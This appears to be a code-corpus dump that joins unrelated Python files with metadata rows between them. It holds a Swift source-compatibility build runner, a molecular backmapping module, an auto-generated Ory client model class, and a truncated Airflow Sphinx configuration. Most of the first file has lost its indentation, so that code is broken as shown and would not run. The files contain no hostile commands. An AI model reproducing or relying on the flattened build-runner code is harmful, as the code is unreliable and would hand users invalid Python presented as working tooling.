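    missing = dict_get(action, 'workspace', default=None)                 # None
    return name, missing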
def enum(*sequential, **named):
    enums = dict(zip(sequential, range(len(sequential))), **named)
    reverse = dict((value, key) for key, value in enums.items())
    keys = list(enums.keys())
    values = list(enums.values())
    enums['keys'] = keys
    enums['values'] = values
    enums['reverse_mapping'] = reverse
    return type('Enum', (object,), enums)
ResultEnum = enum(
'FAIL',
'XFAIL',
'PASS',
'UPASS'
)
class Result(ResultEnum):
def __init__(self, result, text):
self.result = result
self.text = text
def __str__(self):
return ResultEnum.reverse_mapping[self.result]
class ActionResult(Result):
pass
class ListResult(Result):
def __init__(self):
self.subresults = {value: [] for value in ResultEnum.values}
def add(self, result):
if result:
self.subresults[result.result].append(result)
def xfails(self):
return self.subresults[Result.XFAIL]
def fails(self):
return self.subresults[Result.FAIL]
def upasses(self):
return self.subresults[Result.UPASS]
def passes(self):
return self.subresults[Result.PASS]
def all(self):
return [i for l in self.subresults.values() for i in l]
def recursive_all(self):
stack = self.all()
actions = []
while stack:
result = stack.pop(0)
if isinstance(result, ActionResult):
actions.append(result)
else:
for r in result.all():
stack.insert(0, r)
return actions
@property
def result(self):
if self.subresults[Result.FAIL]:
return Result.FAIL
elif self.subresults[Result.UPASS]:
return Result.UPASS
elif self.subresults[Result.XFAIL]:
return Result.XFAIL
elif self.subresults[Result.PASS]:
return Result.PASS
else:
return Result.PASS
def __add__(self, other):
n = self.__class__()
n.subresults = {
Result.__dict__[x]:
(self.subresults[Result.__dict__[x]] +
other.subresults[Result.__dict__[x]])
for x in Result.__dict__ if not x.startswith('_')}
return n
class ProjectListResult(ListResult):
def __str__(self):
output = ""
xfails = [ar for ar in self.recursive_all()
if ar.result == Result.XFAIL]
fails = [ar for ar in self.recursive_all()
if ar.result == Result.FAIL]
upasses = [ar for ar in self.recursive_all()
if ar.result == Result.UPASS]
passes = [ar for ar in self.recursive_all()
if ar.result == Result.PASS]
if xfails:
output += ('='*40) + '\n'
output += 'XFailures:' '\n'
for xfail in xfails:
output += ' ' + xfail.text + '\n'
if upasses:
output += ('='*40) + '\n'
output += 'UPasses:' + '\n'
for upass in upasses:
output += ' ' + upass.text + '\n'
if fails:
output += ('='*40) + '\n'
output += 'Failures:' + '\n'
for fail in fails:
output += ' ' + fail.text + '\n'
output += ('='*40) + '\n'
output += 'Action Summary:' + '\n'
output += (' Passed: %s' % len(passes)) + '\n'
output += (' Failed: %s' % len(fails)) + '\n'
output += (' XFailed: %s' % len(xfails)) + '\n'
output += (' UPassed: %s' % len(upasses)) + '\n'
output += (' Total: %s' % (len(fails) +
len(passes) +
len(xfails) +
len(upasses))) + '\n'
output += '='*40 + '\n'
output += 'Repository Summary:' + '\n'
output += ' Total: %s' % len(self.all()) + '\n'
output += '='*40 + '\n'
output += 'Result: ' + Result.__str__(self) + '\n'
output += '='*40
return output
class ProjectResult(ListResult):
pass
class VersionResult(ListResult):
pass
class ListBuilder(Factory):
def __init__(self, include, exclude, verbose, subbuilder, target):
self.include = include
self.exclude = exclude
self.verbose = verbose
self.subbuilder = subbuilder
self.target = target
def included(self, subtarget):
return True
def subtargets(self):
return self.target
def payload(self):
return []
def build(self, stdout=sys.stdout):
results = self.new_result()
for subtarget in self.subtargets():
if self.included(subtarget):
(log_filename, output_fd) = self.output_fd(subtarget)
subbuilder_result = None
try:
subbuilder_result = self.subbuilder(*([subtarget] + self.payload())).build(
stdout=output_fd
)
results.add(subbuilder_result)
finally:
if output_fd is not sys.stdout:
output_fd.close()
os.rename(
log_filename,
'%s_%s' % (subbuilder_result, log_filename),
)
return results
def new_result(self):
return ListResult()
def output_fd(self, subtarget):
return (None, sys.stdout)
class ProjectListBuilder(ListBuilder):
def included(self, subtarget):
project = subtarget
return (('platforms' not in project or
platform.system() in project['platforms']) and
included_element(self.include, self.exclude, project))
def new_result(self):
return ProjectListResult()
class ProjectBuilder(ListBuilder):
def payload(self):
return [self.target]
def included(self, subtarget):
version = subtarget
return included_element(self.include, self.exclude, version)
def subtargets(self):
return self.target['compatibility']
def new_result(self):
return ProjectResult()
class VersionBuilder(ListBuilder):
def __init__(self, include, exclude, verbose, subbuilder, target, project):
super(VersionBuilder, self).__init__(include, exclude, verbose, subbuilder, target)
self.project = project
def included(self, subtarget):
action = subtarget
return included_element(self.include, self.exclude, action)
def new_result(self):
return VersionResult()
def subtargets(self):
return self.project['actions']
def payload(self):
return [self.target, self.project]
def output_fd(self, subtarget):
scheme_target = dict_get(subtarget, 'scheme', 'target', default=False)
destination = dict_get(subtarget, 'destination', default=False)
project_identifier = dict_get(self.project, 'path', default="") + " " + \
dict_get(subtarget, 'project', default="").split('-')[0]
identifier = '_'.join(
[x.strip() for x in [project_identifier, self.target['version'], subtarget['action']]] +
([scheme_target] if scheme_target else []) +
([destination] if destination else [])
)
log_filename = re.sub(
r"[^\w\_\.]+", "-", identifier
).strip('-').strip('_') + '.log'
if self.verbose:
fd = sys.stdout
else:
fd = open(log_filename, 'w')
return (log_filename, fd)
class ActionBuilder(Factory):
def __init__(self, swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
project_cache_path,
action, project):
self.swiftc = swiftc
self.swift_version = swift_version
self.swift_branch = swift_branch
set_swift_branch(swift_branch)
self.sandbox_profile_xcodebuild = sandbox_profile_xcodebuild
self.sandbox_profile_package = sandbox_profile_package
self.project = project
self.action = action
self.root_path = common.private_workspace(project_cache_path)
self.current_platform = platform.system()
self.added_swift_flags = added_swift_flags
self.added_xcodebuild_flags = added_xcodebuild_flags
self.skip_clean = skip_clean
self.build_config = build_config
self.strip_resource_phases = strip_resource_phases
self.init()
def init(self):
pass
def build(self, stdout=sys.stdout):
self.checkout_branch(self.project['branch'],
stdout=stdout, stderr=stdout)
return self.dispatch(self.project['branch'],
stdout=stdout, stderr=stdout)
def checkout_branch(self, branch, stdout=sys.stdout, stderr=sys.stderr):
self.checkout(ref=branch, ref_is_sha=False, pull_after_update=True,
stdout=stdout, stderr=stderr)
def checkout_sha(self, sha, stdout=sys.stdout, stderr=sys.stderr):
self.checkout(ref=sha, ref_is_sha=True, pull_after_update=False,
stdout=stdout, stderr=stderr)
def checkout(self, ref, ref_is_sha, pull_after_update,
stdout=sys.stdout, stderr=sys.stderr):
if not os.path.exists(self.root_path):
common.check_execute(['mkdir', '-p', self.root_path],
stdout=stdout, stderr=stderr)
path = os.path.join(self.root_path, self.project['path'])
if self.project['repository'] == 'Git':
if os.path.exists(path):
if ref_is_sha:
common.git_update(self.project['url'], ref, path,
incremental=self.skip_clean,
stdout=stdout, stderr=stderr)
else:
if not self.skip_clean:
common.git_clean(path, stdout=stdout, stderr=stderr)
common.git_checkout(ref, path,
force=True,
stdout=stdout, stderr=stderr)
if pull_after_update:
common.git_pull(path, stdout=stdout, stderr=stderr)
else:
common.git_clone(self.project['url'], path, ref,
stdout=stdout, stderr=stderr)
else:
raise common.Unreachable('Unsupported repository: %s' %
self.project['repository'])
def dispatch(self, identifier, stdout=sys.stdout, stderr=sys.stderr):
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
incremental=self.skip_clean,
stdout=stdout, stderr=stderr)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def failed(self, identifier, error):
if 'xfail' in self.action:
error_str = 'XFAIL: %s: %s' % (identifier, error)
result = ActionResult(Result.XFAIL, error_str)
else:
error_str = 'FAIL: %s: %s' % (identifier, error)
result = ActionResult(Result.FAIL, error_str)
common.debug_print(error_str)
return result
def succeeded(self, identifier):
if 'xfail' in self.action:
error_str = 'UPASS: %s: %s' % (identifier, self.action)
result = ActionResult(Result.UPASS, error_str)
else:
error_str = 'PASS: %s: %s' % (identifier, self.action)
result = ActionResult(Result.PASS, error_str)
common.debug_print(error_str)
return result
class CompatActionBuilder(ActionBuilder):
def __init__(self,
swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
only_latest_versions,
project_cache_path,
action, version, project):
super(CompatActionBuilder, self).__init__(
swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
added_xcodebuild_flags,
skip_clean, build_config,
strip_resource_phases,
project_cache_path,
action, project
)
self.only_latest_versions = only_latest_versions
self.version = version
def dispatch(self, identifier, stdout=sys.stdout, stderr=sys.stderr):
if self.only_latest_versions:
if self.version['version'] != \
sorted(self.project['compatibility'],
reverse=True,
key=lambda x: [float(y) for y in x['version'].split('.')])[0]['version']:
return None
if not self.swift_version:
self.swift_version = self.version['version']
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
incremental=self.skip_clean,
should_strip_resource_phases=self.strip_resource_phases,
stdout=stdout, stderr=stderr)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def build(self, stdout=sys.stdout):
scheme_target = dict_get(self.action, 'scheme', 'target', default=False)
# FIXME: Why isn't this used?
identifier = ': '.join(
[self.project['path'], self.version['version'], self.action['action']] +
([scheme_target] if scheme_target else [])
)
if len(self.version['commit']) != 40:
common.debug_print("ERROR: Commits must be 40 character SHA hashes")
            sys.exit(1)
self.checkout_sha(
self.version['commit'],
stdout=stdout, stderr=stdout
)
action_result = self.dispatch('%s, %s' % (self.version['version'], self.version['commit'][:6]),
stdout=stdout, stderr=stdout)
return action_result
def failed(self, identifier, error):
version_commit = self.version['commit'][:6]
bug_identifier = None
build_config = self.build_config if self.build_config else self.action.get('configuration', None)
if 'xfail' in self.action:
bug_identifier = is_xfailed(self.action['xfail'],
self.version['version'],
self.current_platform,
self.swift_branch,
build_config)
if bug_identifier:
error_str = 'XFAIL: {bug}, {project}, {compatibility}, {commit}, {action_target}'.format(
bug=bug_identifier,
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.XFAIL, error_str)
else:
error_str = 'FAIL: {project}, {compatibility}, {commit}, {action_target}'.format(
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.FAIL, error_str)
common.debug_print(error_str)
return result
def succeeded(self, identifier):
version_commit = self.version['commit'][:6]
bug_identifier = None
build_config = self.build_config if self.build_config else self.action.get('configuration', None)
if 'xfail' in self.action:
bug_identifier = is_xfailed(self.action['xfail'],
self.version['version'],
self.current_platform,
self.swift_branch,
build_config)
if bug_identifier:
error_str = 'UPASS: {bug}, {project}, {compatibility}, {commit}, {action_target}'.format(
bug=bug_identifier,
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.UPASS, error_str)
else:
error_str = 'PASS: {project}, {compatibility}, {commit}, {action_target}'.format(
project=self.project['path'],
compatibility=self.version['version'],
commit=version_commit,
action_target = dict_get(self.action, 'scheme', 'target', default="Swift Package")
)
if 'destination' in self.action:
error_str += ', ' + self.action['destination']
result = ActionResult(Result.PASS, error_str)
common.debug_print(error_str)
return result
class EarlyExit(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def ignore_missing(f):
if (f.endswith('.dia') or
f.endswith('~')):
return True
return False
def ignore_diff(f):
if (f.endswith('-master.swiftdeps') or
f.endswith('dependency_info.dat')):
return True
return False
def have_same_trees(full, incr, d):
ok = True
for f in d.left_only:
if ignore_missing(f):
continue
ok = False
common.debug_print("Missing 'incr' file: %s"
% os.path.relpath(os.path.join(d.left, f), full))
for f in d.right_only:
if ignore_missing(f):
continue
ok = False
common.debug_print("Missing 'full' file: %s"
% os.path.relpath(os.path.join(d.right, f), incr))
for f in d.diff_files:
if ignore_diff(f):
continue
ok = False
common.debug_print("File difference: %s"
% os.path.relpath(os.path.join(d.left, f), full))
for sub in d.subdirs.values():
ok = have_same_trees(full, incr, sub) and ok
return ok
class IncrementalActionBuilder(ActionBuilder):
def __init__(self, swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags, build_config,
strip_resource_phases,
project, action):
super(IncrementalActionBuilder,
self).__init__(swiftc, swift_version, swift_branch,
sandbox_profile_xcodebuild,
sandbox_profile_package,
added_swift_flags,
skip_clean=True,
build_config=build_config,
strip_resource_phases=strip_resource_phases,
project=project,
action=action)
self.proj_path = os.path.join(self.root_path, self.project['path'])
self.incr_path = self.proj_path + "-incr"
def curr_build_state_path(self):
if self.action['action'] == 'BuildSwiftPackage':
return os.path.join(self.proj_path, ".build")
match = re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
self.action['action'])
if match:
project_path = os.path.join(self.proj_path,
self.action[match.group(2).lower()])
return os.path.join(os.path.dirname(project_path), "build")
else:
raise Exception("Unsupported action: " + self.action['action'])
def ignored_differences(self):
if self.action['action'] == 'BuildSwiftPackage':
return ['ModuleCache', 'build.db', 'master.swiftdeps', 'master.swiftdeps~']
elif re.match(r'^(Build|Test)Xcode(Workspace|Project)(Scheme|Target)$',
self.action['action']):
return ['ModuleCache', 'Logs', 'info.plist', 'dgph', 'dgph~',
'master.swiftdeps', 'master.swiftdeps~']
else:
raise Exception("Unsupported action: " + self.action['action'])
def expect_determinism(self):
# We're not seeing determinism in incremental builds yet, so
# for the time being disable the expectation.
return False
def saved_build_state_path(self, seq, flav, sha):
return os.path.join(self.incr_path, ("build-state-%03d-%s-%.7s" %
(seq, flav, sha)))
def restore_saved_build_state(self, seq, flav, sha, stdout=sys.stdout):
src = self.saved_build_state_path(seq, flav, sha)
dst = self.curr_build_state_path()
proj = self.project['path']
common.debug_print("Restoring %s build-state #%d of %s from %s" %
(flav, seq, proj, src), stderr=stdout)
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst, symlinks=True)
def save_build_state(self, seq, flav, sha, stdout=sys.stdout):
src = self.curr_build_state_path()
dst = self.saved_build_state_path(seq, flav, sha)
proj = self.project['path']
common.debug_print("Saving %s state #%d of %s to %s" %
(flav, seq, proj, dst), stderr=stdout)
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst, symlinks=True)
def check_full_vs_incr(self, seq, sha, stdout=sys.stdout):
full = self.saved_build_state_path(seq, 'full', sha)
incr = self.saved_build_state_path(seq, 'incr', sha)
common.debug_print("Comparing dirs %s vs. %s" % (os.path.relpath(full),
os.path.basename(incr)),
stderr=stdout)
d = filecmp.dircmp(full, incr, self.ignored_differences())
if not have_same_trees(full, incr, d):
message = ("Dirs differ: %s vs. %s" %
(os.path.relpath(full),
os.path.basename(incr)))
if self.expect_determinism():
raise EarlyExit(ActionResult(Result.FAIL, message))
else:
common.debug_print(message, stderr=stdout)
def excluded_by_limit(self, limits):
for (kind, value) in limits.items():
if self.action.get(kind) != value:
return True
return False
def build(self, stdout=sys.stdout):
action_result = ActionResult(Result.PASS, "")
try:
if 'incremental' in self.project:
for vers in self.project['incremental']:
incr = self.project['incremental'][vers]
if 'limit' in incr and self.excluded_by_limit(incr['limit']):
continue
ident = "%s-incr-%s" % (self.project['path'], vers)
action_result = self.build_incremental(ident,
incr['commits'],
stdout=stdout)
except EarlyExit as error:
action_result = error.value
return action_result
def dispatch(self, identifier, incremental, stdout=sys.stdout, stderr=sys.stderr):
try:
dispatch(self.root_path, self.project, self.action,
self.swiftc,
self.swift_version,
self.sandbox_profile_xcodebuild,
self.sandbox_profile_package,
self.added_swift_flags,
self.added_xcodebuild_flags,
self.build_config,
should_strip_resource_phases=False,
stdout=stdout, stderr=stderr,
incremental=incremental)
except common.ExecuteCommandFailure as error:
return self.failed(identifier, error)
else:
return self.succeeded(identifier)
def dispatch_or_raise(self, identifier, incremental,
stdout=sys.stdout, stderr=sys.stderr):
time.sleep(2)
action_result = self.dispatch(identifier, incremental=incremental,
stdout=stdout, stderr=stderr)
time.sleep(2)
if action_result.result not in [ResultEnum.PASS,
ResultEnum.XFAIL]:
raise EarlyExit(action_result)
return action_result
def build_incremental(self, identifier, commits, stdout=sys.stdout):
if os.path.exists(self.incr_path):
shutil.rmtree(self.incr_path)
os.makedirs(self.incr_path)
prev = None
seq = 0
action_result = ActionResult(Result.PASS, "")
for sha in commits:
proj = self.project['path']
ident = "%s-%03d-%.7s" % (identifier, seq, sha)
if prev is None:
common.debug_print("Doing full build #%03d of %s: %.7s" %
(seq, proj, sha), stderr=stdout)
self.checkout_sha(sha, stdout=stdout, stderr=stdout)
action_result = self.dispatch_or_raise(ident, incremental=False,
stdout=stdout, stderr=stdout)
                self.save_build_state(seq, 'full', sha, stdout=stdout)
else:
common.debug_print("Doing incr build #%d of %s: %.7s -> %.7s" %
(seq, proj, prev, sha), stderr=stdout)
common.git_checkout(sha, self.proj_path, stdout=stdout, stderr=stdout)
common.git_submodule_update(self.proj_path, stdout=stdout, stderr=stdout)
action_result = self.dispatch_or_raise(ident, incremental=True,
stdout=stdout, stderr=stdout)
self.save_build_state(seq, 'incr', sha, stdout=stdout)
prev = sha
seq += 1
return action_result
| 40.458121 | 110 | 0.532449 |
eb3a533ac99112849b4b8385b6346b1f2dc1f97e | 1,487 | py | Python | backmap/backmapping.py | oliviadunne/backmap | e2f6ad0d644075cf24dac2b21c49279989cc194f | ["MIT"] | null | null | null | backmap/backmapping.py | oliviadunne/backmap | e2f6ad0d644075cf24dac2b21c49279989cc194f | ["MIT"] | null | null | null | backmap/backmapping.py | oliviadunne/backmap | e2f6ad0d644075cf24dac2b21c49279989cc194f | ["MIT"] | null | null | null |
"""
backmapping.py
Backmapping for molecules
Handles the primary functions
##
TODO
----
-> Generalize to arbitrary number of different types and number of molecules
"""
import mdtraj as md
import numpy as np
from .utils import parse_AA_pdb, parse_CG_pdb
from .COM_backmap import COM_backmap
__all__ = ["Backmapping"]
class Backmapping():
def __init__(self, CG_pdb_f_name, AA_pdb_f_name):
self.CG_pdb_f_name = CG_pdb_f_name
self.AA_pdb_f_name = AA_pdb_f_name
self.CG_trj = md.load_pdb(filename=self.CG_pdb_f_name).remove_solvent()
self.CG_top = self.CG_trj.top
self.AA_trj = md.load_pdb(filename=self.AA_pdb_f_name).remove_solvent()
self.AA_top = self.AA_trj.top
self.CG_beads = parse_CG_pdb(self.CG_pdb_f_name)
self.AA_beads = parse_AA_pdb(self.AA_pdb_f_name)
def backmap(self, struct_fname, output_f_name=None, mode='COM'):
if output_f_name is None:
self.output_f_name = struct_fname.split(".")[0] + "_backmapped.pdb"
else:
self.output_f_name = output_f_name
self.CG_struct = md.load(struct_fname)
if mode == 'COM':
self.AA_new_trj = COM_backmap(self.CG_struct, self.AA_trj, self.CG_beads, self.AA_beads)
else:
raise NotImplementedError("Only 'COM' backmapping is supported")
print(f"Writing output to {self.output_f_name}")
self.AA_new_trj.save_pdb(self.output_f_name)
return self.AA_new_trj
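# Illustrative usage sketch, not part of the original module: the PDB file names
# below are hypothetical and only show the intended call pattern.
if __name__ == "__main__":
    bm = Backmapping(CG_pdb_f_name="cg_reference.pdb", AA_pdb_f_name="aa_reference.pdb")
    # Default 'COM' mode; writes cg_structure_backmapped.pdb unless output_f_name is given.
    bm.backmap("cg_structure.pdb")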
| 31.638298 | 100 | 0.694015 |
4aaa272ee56bc88acb88a06c9da41b53f6c7b241 | 6,948 | py | Python | clients/client/python/ory_client/model/ui_node_anchor_attributes.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | ["Apache-2.0"] | null | null | null | clients/client/python/ory_client/model/ui_node_anchor_attributes.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | ["Apache-2.0"] | null | null | null | clients/client/python/ory_client/model/ui_node_anchor_attributes.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | ["Apache-2.0"] | null | null | null |
"""
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.9
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
from ory_client.model.ui_text import UiText
globals()['UiText'] = UiText
class UiNodeAnchorAttributes(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'href': (str,), # noqa: E501
'title': (UiText,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'href': 'href', # noqa: E501
'title': 'title', # noqa: E501
}
_composed_schemas = {}
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, href, title, *args, **kwargs): # noqa: E501
"""UiNodeAnchorAttributes - a model defined in OpenAPI
Args:
href (str): The link's href (destination) URL. format: uri
title (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.href = href
self.title = title
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
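# Illustrative sketch, not part of the generated module: both attributes are required
# at construction time. The UiText arguments shown here are an assumption about that
# model's constructor and may differ from the generated signature.
if __name__ == "__main__":
    from ory_client.model.ui_text import UiText
    anchor = UiNodeAnchorAttributes(
        href="https://www.ory.sh/docs",                          # hypothetical link target
        title=UiText(id=0, text="Documentation", type="info"),   # assumed UiText fields
    )
    print(anchor.href)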
| 38.6 | 194 | 0.585204 |
0f9ad066ab94e54a9887bd7953a206d80eb27a7e | 13,525 | py | Python | docs/conf.py | jvermeire/incubator-airflow | 07e77e965d8396f5f1dedf786ec9d398cc668a49 | ["Apache-2.0"] | 1 | 2020-06-16T17:26:28.000Z | 2020-06-16T17:26:28.000Z | docs/conf.py | sonal-raj/airflow | c63ddccf8de2b702d796dc5ccaf398c8062295f6 | ["Apache-2.0"] | null | null | null | docs/conf.py | sonal-raj/airflow | c63ddccf8de2b702d796dc5ccaf398c8062295f6 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
#
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
import airflow
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'mesos',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
    'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# Hack to allow pieces of the code to behave differently while the docs are
# being built. The main objective was to alter the behavior of
# utils.apply_default, which was hiding function headers.
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
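# Illustrative sketch, not part of the original conf.py: downstream code can key off
# this flag to behave differently only while autodoc introspects callables.
_building_docs = os.environ.get('BUILDING_AIRFLOW_DOCS') == 'TRUE'  # True during doc builds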
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles'
]
autodoc_default_options = {
'show-inheritance': True,
'members': True
}
viewcode_follow_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Airflow'
# copyright = u''
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_api/airflow/_vendor',
'_api/airflow/api',
'_api/airflow/bin',
'_api/airflow/config_templates',
'_api/airflow/configuration',
'_api/airflow/contrib/auth',
'_api/airflow/contrib/example_dags',
'_api/airflow/contrib/index.rst',
'_api/airflow/contrib/kubernetes',
'_api/airflow/contrib/task_runner',
'_api/airflow/contrib/utils',
'_api/airflow/dag',
'_api/airflow/default_login',
'_api/airflow/example_dags',
'_api/airflow/exceptions',
'_api/airflow/index.rst',
'_api/airflow/jobs',
'_api/airflow/lineage',
'_api/airflow/logging_config',
'_api/airflow/macros',
'_api/airflow/migrations',
'_api/airflow/plugins_manager',
'_api/airflow/security',
'_api/airflow/settings',
'_api/airflow/stats',
'_api/airflow/task',
'_api/airflow/ti_deps',
'_api/airflow/utils',
'_api/airflow/version',
'_api/airflow/www',
'_api/main',
'autoapi_templates',
